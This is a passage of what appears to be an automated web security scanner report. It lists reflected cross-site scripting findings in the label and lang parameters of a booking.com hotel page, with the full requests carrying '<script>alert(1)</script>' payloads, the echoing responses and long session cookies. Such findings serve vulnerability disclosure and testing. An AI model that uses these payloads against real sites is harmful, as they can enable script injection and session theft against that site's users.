JMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:14:00 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YWaiSgbFU5%2BGbFMKGxhLGxcV8JgVcsNPdwFrYE9stqnMmO6fnezme%2FSKovCgD%2FmghVroj8%2Fv94KVF6nxVdJXxbxsoyyUKiMxk%2BHqWhhgecDSoZbfT3IgB%2Bys5JhVUx09wv%2FCvqgNFA3NTgOGzPpI21kul0Km944LAkGjdCk98wlfQJBQIMubVfwwTOiRjuhNTdmO3Arzv5TP%2B554VEudje40Z8cfyqZ06Lc4QvCHW5ttNGQ%2BIad7noRujQlQVCKhyWKOE6Eo1n3N6aR6certxqGl38fEJzkQPbYn1qGOItUUm%2FOYEMIq%2FyMr4VDvz%2Be4RfapT9%2Bez%2BNVYQ%2Bdlv87DkdXvN%2BbnMOdMzpEXWhAH9qNjlZ71rvXXvJrfbGJg8Kro8dJq9Bx22pxeX5puEOANM7mDjSVTGQfv6cZg2iJpy66pGhA4c1tnsFtS1oVGn3Z%2BFIBA01R3VhaI60xAxg587Tf%2BBN0Nb832D9CwPqiPsrDAjr01J8Lhew%2FvLEiX9GCG9tszA3SXlesk3QQeA6gN2xThCdpUEcKKpn9wBASP6irw%2Bm0CcMtCp%2BZK%2FdgOEG%2Bq1vrdS2h2GMq9rTCdVsS6VpM8frDZq6fwhbw68G6LavMuIKDc6STqUtTh91C6oovmRh%2Fvgz6VpegApFBpvWwg7hyJohSQPigg1eoBT9awgqDlxbXiOf3pO9FGTVbsXbOp9fHXdgqbXpiu6rkEYMvK4%2FH5EpYBbC9NQjADPtg84ePxV5JFOlABqQbM37dsyNq5Xeif5YUQEOJplrOfb4QMvNShvWBMqrymM0f42gK4RHlnEXNz8n4dCp2yPQJuqtJ9nj36s2hlfkqQ2127YunPFfVi3HMuHp3FRc3%2BNrwCZY%2BuDZbufxU7RCn8T6pC31rC6fARWEqN8Mva5xV0aRpfYUxtMLqWpePQdPd0%2FtQE93Z8tLVQG65HP%2FwKRcleAGoByyLJL6IdywGN2kUIPu5%2BzMi3R%2BvaMfyfGPzqFbVTOZ9F6GNdBC1iHPeHo%2BYKakt%2FIT%2BGSev%2Fr7RjCFW2nnfBrqFW94jOCvpWfYwcCF1uDSJTtnesHvmlIRNi0ynBmqg%2By3wHpvV%2FePbPapZrS41q7WkkSzpURMufL3zKzw4%2BIl4uh%2BkQEiFZ%2BkGHrFs9p48rryNDRkNdimQMYzFAD5EnvDzkDk%2FVdIJAHVoRmJUS%2FCzxEmLGPHMF6NxUjMZoa%2BO5RoSRXgI%2BQ%2FQgEjxZ2dkw2D7%2B5VOCA1etNpHfjm9LEuzyv52FtqjJ5H7F0ytcgDztDgpzKjzqWhEebIhZe9ZcXIqNiYH4A0niXFHuhu21uYbKgx1uTvk8t6wqW0vd%2BHX9N%2FyT%2Bz%2Fz%2FQoNCMyM7%2FdVosSUDLuUn6CzA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:14:01 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232259
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
inal_url : 'http://www.booking.com/hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=ond12ee</script><script>alert(1)</script>d8fe18de66e&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en',
b_this_url : '/hotel/us/c-boston-massachusettes.en-us.html?aid=323804;label=hotel-59554;sid=9
...[SNIP]...
4.180. http://www.booking.com/hotel/us/c-boston-massachusettes.html [label parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the label request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1be8b"><script>alert(1)</script>a0af0a5308c was submitted in the label parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-595541be8b"><script>alert(1)</script>a0af0a5308c&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:11:43 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdL0X2loyNGhkfPO6rvm8O2ZG3z%2BcatT%2B17ujnQNiNZeBAm%2FryzeQMya5S9PYPdK6inPiSJW3j1s0Wvwn%2FGlx5Ue2lu7qA1TICmOgWlTu%2FlSRUjk499sydT6gBGxPzpuukBKklZsdYu0viaHHNTsZ6Gt6LHIm5nSIp9mCRHJEh9gy3%2BrRkNKcw1CltVIAZHTHazUnSpInDMHKdpQJxqMEajQBL131rhAMIO7osOTfUUl1%2FUsySE6QzemE8tUy4qelKOg3aDBUF5%2BXDnaDYzYWBTzovMfNCeQY1u3OFu%2FcrE0EbDS7%2BsaFvZ8u%2B1g66aXjwx%2FG91a3X8yALwcRe%2Bwpw3vobKW9Fr%2FGAtK1uN3AscnAMvpTGmyjMIDZn%2FH6eLbGNVy2ZShVXkw3izHSnMuDlUoeyKrsnO3UQkewK1rg13HZ2Iay%2Fn3Az87x7qgV%2BDRapI1aR7wAZmZq3dXL4Hd0i2o1PbYlcxcgB4ZDyv2ZBMkKq2Uz%2FYcKq2FnRPVsdWqq%2F2YDjvpE5ELEFVOHHRYCjkeNoFZ%2BgMJoi8Ue5Mecu4tLrLC9tvEvev%2BmBiHArB7iLDR5mhtLZGZ9CKygkYtLH%2Fk30R3igE9lYLWIhNfO2qlIqPwFNYzGXm1bWEPvRsMX3sBKtsI3hmJASucc%2B1tPmN9%2FZSboQ4bNnWfAB6hOd7nJQadud%2Ftn%2BDjDEu%2BYk3YpTD%2FF0n%2FVmDmr34WwAqNnfETOhiCvrgIWrS3r9o4wiPtL26x5DqqSzeHMdJu7oJL0s1ssIMrnCEen9An2TSbCFiCd9b1IX1h6LUIjQN7VWFvawxbx3sa%2B5K%2FOaaNFNTTXzwZVL%2FDWsT9YDxeQrY%2BxIChN79XY5IwcEfUVE3i9HJCS%2BIKmfL7zIsLbUanppRcwLIQ8U1eiTQ2ckOYhQj9iYQWb4F3%2FiQ6Jg6l96h8o%2BmQ8yr4iEmNWw9f12aXeHeIlVBxkuf66Zwf8QuYjfkBVDYE%2BhptLS51K0wWIrfYaUGAFoftJL%2F7gZL%2Bp0yrjhGyb%2BH%2BpQ3HjeF16Gh7z9YVN%2FHm9Bqi%2FEGCAAFTxcf4%2Fe2Co%2FA0mGefMihKzP9JGq0TpHfarzQKLaOqb2GEnfF%2FcXRWxUXkR3BZaMTFjAkI3V67AnoA6P5aQVbgQreEFQt8UP%2BKzJscuNAIH4I5HejF2He3HULcTKR7XMd4dtF6RO5ZMopOpBZ63SmENzQTqAlP9L6ybTEHGFt0Wd8TnRHFa%2B98eY5f038Y9Et0%2FdMZU6NrM6ItNTUMg0fQefTAZWwhpmWgSDlF8w4sYN6yT92JXCr4Ggc5Rwu6bXPYl8642z%2B%2F1t6HpWti8r2jwBLZQ7kEg6KiESZeNlnhQMM5ffoUKXhbKQLQiFfsQA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:11:43 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 247280
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
ank" title="Forgotten your password?" href="https://secure.booking.com/login.html?op=remind;lang=en;go_back_url=http://www.booking.com/hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-595541be8b"><script>alert(1)</script>a0af0a5308c&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang
...[SNIP]...
4.181. http://www.booking.com/hotel/us/c-boston-massachusettes.html [label parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the label request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fddd2</script><script>alert(1)</script>fcb6fa376ec was submitted in the label parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554fddd2</script><script>alert(1)</script>fcb6fa376ec&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:12:40 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdL0X2loyNGhkfPO6rvm8O2ZG3z%2BcatT%2B17ujnQNiNZeBAm%2FryzeQMya5S9PYPdK6inPiSJW3j1s0Wvwn%2FGlx5Ue2lu7qA1TICmOgWlTu%2FlSRUjk499sydT6gBGxPzpuukBKklZsdYu0viaHHNTsZ6Gt6LHIm5nSIp9mCRHJEh9gy3%2BrRkNKcw1CltVIAZHTHazUnSpInDMHKdpQJxqMEajQBL131rhAMIO7osOTfUUl1%2FUsySE6QzemE8tUy4qelKOg3aDBUF5%2BXDnaDYzYWBTzovMfNCeQY1u3OFu%2FcrE0EbDS7%2BsaFvZ8u%2B1g66aXjwx%2FG91a3X8yALwcRe%2Bwpw3vobKW9Fr%2FGAtK1uN3AscnAMvpTGmyjMIDZn%2FH6eLbGNVy2ZShVXkw3izHSnMuDlUoeyKrsnO3UQkewK1rg13HZ2Iay%2Fn3Az87x7qgV%2BDRapI1aR7wAZmZq3dXL4Hd0i2o1PbYlcxcgB4ZDyv2ZBMkKq2Uz%2FYcKq2FnRPVsdWqq%2F2YDjvpE5ELEFVOHHRYCjkeNoFZ%2BgMJoi8Ue5Mecu4tLrLC9tvEvev%2BmBiHArB7iLDR5mhtLZGZ9CKygkYtLH%2Fk30R3igE9lYLWIhNfO2qlIqPwFNYzGXm1bWEPvRsMX3sBKtsI3hmJASucc%2B1tPmN9%2FZSboQ4bNnWfAB6hOd7nJQadud%2Ftn%2BDjDEu%2BYk3YpTD%2FF0n%2FVmDmr34WwAqNnfETOhiCvrgIWrS3r9o4wiPtL26x5DqqSzeHMdJu7oJL0s1ssIMrnCEen9An2TSbCFiCd9b1IX1h6LUIjQN7VWFvawxbx3sa%2B5K%2FOaaNFNTTXzwZVL%2FDWsT9YDxeQrY%2BxIChN79XY5IwcEfUVE3i9HJCS%2BIKmfL7zIsso8c5wdB1ecWrXWSUdBvrkvo%2B0APDzbjEyfB%2Bioa6xdydU5DErgBsYv%2BOTi7Hv181lcIFrLJyt2VMB9HKflj3Z20XJbEHjFrTD3ZBwPz2%2BQn8%2BvxbMihBH1L%2B%2BxvzOYmziRKnL2EtFKt4rrc3GdvNLmA3mIWqq6KWygDVHmD8FR66dwuhMOQjyRFDcO6HCoSeGfDAZW12nAbsU6H3El6xEskfWcc1H2pvtm2r4uu6g16fYhkCXB4bRNHJzd3qePZmYg0ztO29%2Bycc5R5Q5G3F9Bo1UdJOsaIABWolXROSOAU8nbZh7j9D%2Bo5XxwCOJckv0V0lqOFSc43MpNK%2FjPxaysiXCHo%2FhQvZz2XYy9ir4t3afd6txd5PiNqSK7tF3HF3hl2u4gbtVQfp%2FsoKXaA0CFSbsMew4b7acbX4XRxOVzPqJ%2F9Gk3LJo400KkMMwq%2Fl42uhZ4zSXMY%2FrZ5L14wSV6DZVs%2BNboAJOLq01LaQaw%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:12:40 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 249437
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
us',
"b_fb_id" : 'FB_text',
locale_for_facebook : 'en_US',
b_domain_end : '.booking.com',
b_original_url : 'http://www.booking.com/hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554fddd2</script><script>alert(1)</script>fcb6fa376ec&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang
...[SNIP]...
4.182. http://www.booking.com/hotel/us/c-boston-massachusettes.html [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dabd9</script><script>alert(1)</script>c4e3a42ad78 was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=endabd9</script><script>alert(1)</script>c4e3a42ad78 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 01:16:34 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YT0ShudbNrGVPaDSzvXFe4xbht5lFgMyVAQm0%2BrKYWrAruXQOLMfCI2HIOoK64mzxHU2LtZgl19yBQo2%2BxipIgwUyVCsEw61ZHIPe1uGDbXdXqljeH%2Bi0I9T%2BJh7HRJ5ltjenueABovvaNd1jkgQXe7MsVu6Q97TdnZFlV9wxiy%2FnJvqwhZ2fts6smQSmVceJ3Gl9SkCDmvzmu3keOUHThunvdYTOWweoHF29EwDbsBDYGqY8b8PqU0BYumexYRegqvMFGCnkEaATpWHxGraVlu0KWN24VWvTOF9UxOhVbaFjcl3GZx4empOFKnu5lFkZz46akS%2FJet8tMHnXOYCb5VjYdjRYYFf3Eg6Fde0NnEYOU95fg3S%2Bu1iLI9cDKtXjeqQoz7Sa%2FiiB9%2BWcqonU4DhgyMzT4TR3RV8ZfB4DaT89b8fPsv9i0wTGa%2Bs3HHHhlVKkyk37hzDHIS4gyXK3ZPjbOIVH6%2FtchT1Y%2FD2eqgztbu8mPRrVs%2BiiFxuKrAJUEfZtd7XevU%2B2JZi7NBhSu4m6LpurXzaq0RJb5v8qsX7YZbdx%2F4%2FeuYrADP2vtiTCpS3EmTvK6LL8gsImxEYRAHbP2jNbZtpvlVCBr%2BTXWvTNkbF5aaak%2BBK2Fsk5ZS3BOF5UHxG6AVQjZVNG9rF%2BsBz%2B%2FNCX0%2BX1iVsx4BXNPW94c0wB9eKUlR5X63iq%2BBZdE9xY7kybvgpOSz3Iyflqkkd5IgoVR%2BrEJNhtyHgcXLy3JlP5oQmzE5iJVgXXY3eTuxylnPj90ak3TVnIzYbQ5drsNiKSMbiBhS%2Bnyy2eC7QRvxpe4EUp8V8D7RyWqOtkRol7gMbKWEg97d6yswh%2FU%2BgTMS5L3APHy0iOe%2BNqbw8kAQ01H405Bq7R0ftE8bSm9KPrkOg2zWt6dbVQ1IHDMBewd24d4s2E9epYEx2D7aRtvoOMuINtxxDIs8yZBh6oLMaSc7jwZ8cNBqL2Q%2F783%2FCnGcipNNoOui8erWbJ4i3aHggy4PJx7hatbUrjlwVStI9DlMZcn3uI81p9GGH8CxtwBfq732BRkhm%2BG7NXviPFZujQl%2BUJPBGl%2BZWNFHY%2BF1rAERYRJkacOxjvY0lTU%2FPZq4Y%2BJOiSswadh7kzMP9Ba5KxU85F4vEXJLAnniootXZ1yvhdq7%2FPq3YUvc1GIyb0K5uaOeojn5RNcry1czvCvzCdcYvJ99YIW1wjQIp7qj9zudCHwfwcLYa3ZgAF9PHQdWPuc4J2J5bISG8ww05H4I09f7VTyNKqCJSGAhbxSkjPDg36B8D8mcxlQ6gvp1VhIR3UwcxwuRhfXMn%2F%2FqH57QkzUSRh%2B%2BhwWl%2BK1M9j%2BDqf4QQRslBQgHgaBNQPAThR4%2Fsg9ik%2FK%2BQ9Aaox8wtncVUsaU6E8qVG%2B33oDFOJ59vT3W